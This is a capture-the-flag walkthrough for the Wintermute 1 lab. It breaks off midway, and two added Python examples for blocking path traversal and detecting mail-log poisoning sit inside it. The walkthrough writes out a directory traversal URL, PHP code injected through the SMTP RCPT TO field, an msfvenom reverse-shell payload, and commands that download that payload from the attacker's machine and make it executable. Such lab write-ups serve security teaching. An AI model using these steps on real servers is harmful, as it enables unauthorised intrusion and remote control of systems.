
Hack the WinterMute: 1 (CTF Challenge)

[Category: Systems (Linux) | Posted by: 店小二05 | Date: 2018 | Author: 红领巾]

Hello friends! Today we are going to take on another CTF challenge known as Wintermute (Part 1). It is another boot2root challenge provided for practice, so let's try to break into it. Before we start, note that you can download it from here: https://www.vulnhub.com/entry/wintermute-1,239/

Security Level: Intermediate

Author Note : There are 2 important things to note down for this lab

1. No buffer overflows or exploit development; any necessary password cracking can be done with small wordlists.

2. Straylight simulates a public-facing server with 2 NICs. Cap this first, then pivot to the final machine. Neuromancer is within a non-public network with 1 NIC.

Imp Note: This lab has 2 parts. The 1st part comprises gaining a root shell on the victim machine and subsequently pivoting to another machine. This post is the 1st part of the lab; we will publish the 2nd part in the upcoming days.

Penetrating Methodologies

Network scanning (Nmap, netdiscover)
HTTP service enumeration
Directory traversal in the browser using email log files
Exploiting OS command injection in the RCPT option of SMTP
Generate PHP backdoor (Msfvenom)
Execute the backdoor embedded in the RCPT option
Reverse connection (Metasploit)
Import python one-liner for a proper TTY shell
Identify the appropriate vulnerable SUID
Exploiting the target (exploit 4115)
Get root access and capture the flag

WalkThrough

Let’s start off with scanning the network to find our target.



We found our target > 192.168.1.124

Our next step is to scan our target with NMAP.

nmap -p- -A 192.168.1.124

The NMAP output shows us that there are 3 ports open: 25 (SMTP), 80 (HTTP) and 3000.

We browsed the URL http://192.168.1.124 and poked around; however, we were not able to find any significant clues to move forward.



As we know that port 3000 is also open on the victim machine, let's try to access the website on the non-standard HTTP port (3000) as follows:

Browse to http://192.168.1.124:3000 and we will be greeted with the following page



As we can see from the hint at the bottom of the page, the default username and password are already provided to us! Let's try to log in to the page with them:

Username: admin

Password: admin



On clicking the Flows option, we were redirected to the following page:



Here we observed that a few directories were listed (as shown in the screenshot above), hence we thought of appending them to our URLs http://192.168.1.124/ or http://192.168.1.124:3000/

We tried accessing http://192.168.1.124:3000/turing-bolo/, but with no success. Then we browsed the URL http://192.168.1.124/turing-bolo/ and got the page below.



Click on Submit Query and we are redirected to the following page:

http://192.168.1.124/turing-bolo/bolo.php?bolo=case



From the above screenshot we can see a few log files (as highlighted). In our experience, this could be an indication of directory traversal: the script includes files by the name passed in the URL, so files that are writable on the target may be pulled in and executed in the browser. Hence let's try to append ../../../log/mail to the URL in the browser as follows:

http://192.168.1.124/turing-bolo/bolo.php?bolo=../../../log/mail
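The traversal above works because the bolo parameter is used as a file name with no check on where it points. The following Python function is an added example of the server-side check that such an endpoint is missing; it is not code from the walkthrough or from the lab, and the log directory, the ".log" suffix and the sample parameter values are all assumptions chosen to mirror bolo.php?bolo=case. It applies an allow-list to the name and a realpath containment test, and it doubles as a triage helper for bolo= values pulled from a web server access log.

```python
import os
import re
from typing import List, Optional, Tuple

# Assumption (hypothetical, not from the lab): the application keeps one log
# per case in this directory and expects a bare case name in the parameter.
LOG_DIR = "/var/www/html/turing-bolo/logs"

# Allow-list for the case name: letters, digits, "_" and "-" only, 1-32 chars.
# This rejects "../", "/", NUL bytes and URL-decoded variants outright.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")


def resolve_log_path(name: str, base_dir: str = LOG_DIR) -> Optional[str]:
    """Return the absolute path of <base_dir>/<name>.log, or None if the
    request must be refused.

    Two independent checks are applied.  The allow-list on the name is the
    primary control.  The realpath containment test is kept as a second
    layer, so that a symlink placed inside the log directory cannot quietly
    redirect the include outside it."""
    if not SAFE_NAME.fullmatch(name):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name + ".log"))
    # The resolved file must sit inside the resolved base directory.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def classify_requests(values: List[str]) -> List[Tuple[str, str]]:
    """Label each bolo= value as 'ok' or 'blocked'.  Run over the values
    extracted from an access log, this flags traversal attempts such as the
    one used in the walkthrough."""
    return [(v, "ok" if resolve_log_path(v) else "blocked") for v in values]


if __name__ == "__main__":
    # Constructed sample values, including the traversal from the walkthrough.
    samples = [
        "case",
        "molly",
        "../../../log/mail",
        "case/../../../etc/passwd",
        "case\x00",
    ]
    for value, verdict in classify_requests(samples):
        print(f"{verdict:8} {value!r}")
```

The allow-list alone would block every value in the sample, so the containment check looks redundant; it is kept because file-inclusion bugs are usually found in code that had one check and lost it in a refactor, and two independent checks fail less often together.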



Now let's try to enumerate further and connect to the SMTP port (25):

telnet 192.168.1.124 25

As we can see, we got connected to the victim machine successfully. Now let's try to send a mail via the command line (CLI) of this machine and pass OS commands via the "RCPT TO" option.

220 straylight ESMTP Postfix (Debian/GNU)
MAIL FROM:<rrajchandel@gmail.com>
250 2.1.0 Ok
RCPT TO:<?php system('whoami'); ?>
501 5.1.3 Bad recipient address syntax

Note: We can ignore the 501 5.1.3 Bad recipient address syntax server response seen in the above screenshot. The server's mail program (on the victim machine) expects an email address as input, not OS commands, so it rejects the address; the rejected address is nevertheless recorded in the mail log.

Now navigate back to the URL http://192.168.1.124/turing-bolo/bolo.php?bolo=../../../log/mail

As depicted in the browser screenshot below, we can clearly see that the mail log file displays the output (www-data) of the Unix command whoami.
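The chain described so far only works because Postfix writes the rejected envelope address into the mail log verbatim and the web application then includes that log. From the defender's side, PHP tags inside a MAIL FROM or RCPT TO address are a reliable signal of this log-poisoning attempt. The following Python scanner is an added example, not code from the walkthrough or the lab; the log lines it contains are constructed to approximate Postfix's mail.log format (the second line mirrors the rejected RCPT shown above), and the field names and patterns it matches are assumptions about that format.

```python
import re
from collections import Counter
from typing import Dict, List

# Indicators that never belong in an envelope address: PHP open tags (the
# walkthrough's payload) and the code-execution idioms that usually follow.
SUSPECT = re.compile(
    r"<\?php|<\?=|\b(?:system|exec|passthru|shell_exec|eval)\s*\(",
    re.IGNORECASE,
)
# Postfix logs the connecting client as "<hostname>[<ip>]" after "from ".
CLIENT = re.compile(r"\bfrom (?P<host>\S+?)\[(?P<ip>[0-9A-Fa-f:.]+)\]")
# Envelope fields that Postfix echoes back verbatim from client input.
FIELD = re.compile(r"\b(from|to|helo)=<([^>]*)>")

# Constructed sample log (approximating Postfix's mail.log format, not taken
# from the lab).  Line 2 mirrors the rejected RCPT from the walkthrough; the
# other lines are ordinary traffic that the scanner must not flag.
SAMPLE_LOG = [
    "Apr 10 12:00:01 straylight postfix/smtpd[1201]: connect from unknown[192.168.1.134]",
    "Apr 10 12:00:09 straylight postfix/smtpd[1201]: NOQUEUE: reject: RCPT from unknown[192.168.1.134]: "
    "501 5.1.3 Bad recipient address syntax; from=<rrajchandel@gmail.com> to=<?php system('whoami'); ?> "
    "proto=SMTP helo=<kali>",
    "Apr 10 12:05:42 straylight postfix/smtpd[1201]: 7F3A2B: client=mail.example.test[203.0.113.7]",
    "Apr 10 12:05:43 straylight postfix/qmgr[1100]: 7F3A2B: from=<alice@example.test>, size=812, nrcpt=1 (queue active)",
    "Apr 10 12:06:00 straylight postfix/smtpd[1201]: NOQUEUE: reject: RCPT from unknown[198.51.100.9]: "
    "501 5.1.3 Bad recipient address syntax; from=<bob@example.test> to=<not an address> proto=ESMTP helo=<mx>",
]


def scan_mail_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per log line that carries a code indicator in an
    envelope field, with the client IP and the offending from/to values."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(lines, 1):
        match = SUSPECT.search(line)
        if not match:
            continue
        client = CLIENT.search(line)
        fields = dict(FIELD.findall(line))
        hits.append({
            "line": lineno,
            "client_ip": client.group("ip") if client else "unknown",
            "indicator": match.group(0),
            "from": fields.get("from", ""),
            "to": fields.get("to", ""),
        })
    return hits


def offenders(hits: List[Dict[str, object]]) -> Dict[str, int]:
    """Count flagged lines per client IP, for blocking or alert thresholds."""
    return dict(Counter(str(h["client_ip"]) for h in hits))


if __name__ == "__main__":
    found = scan_mail_log(SAMPLE_LOG)
    for h in found:
        print(f"line {h['line']}: {h['client_ip']} sent {h['indicator']!r} in to=<{h['to']}>")
    print("per-client counts:", offenders(found))
```

Detection catches the attempt; the fix is elsewhere. The poisoned log only becomes code execution because the web server user can read the mail log and the include takes an arbitrary path, so the two mitigations are to keep mail logs unreadable by www-data (on Debian, rsyslog's default is root:adm with mode 0640) and to constrain what bolo.php will include.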



Let's generate a reverse shell with the following command:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 -f elf > shell.elf

Now run a web server on the Kali machine:

python -m SimpleHTTPServer 80

As we succeeded in receiving the output of OS commands in the email log file, there is a possibility that, following the same method, we may also get Meterpreter access to the victim machine.

Hence, as seen in the screenshot below, we will pass the commands in the RCPT command as follows:

1. Navigate to the /tmp directory and download the shell.elf file from the Kali machine

2. Modify the permissions of the shell.elf file

3. Execute our reverse shell (shell.elf) file

RCPT TO:<?php system('cd /tmp; wget http://192.168.1.134/shell.elf'); ?>
501 5.1.3 Bad recipient address syntax
RCPT TO:<?php system('chmod 777 /tmp/shell.elf'); ?>

Source: https://www.codesec.net/view/586914.html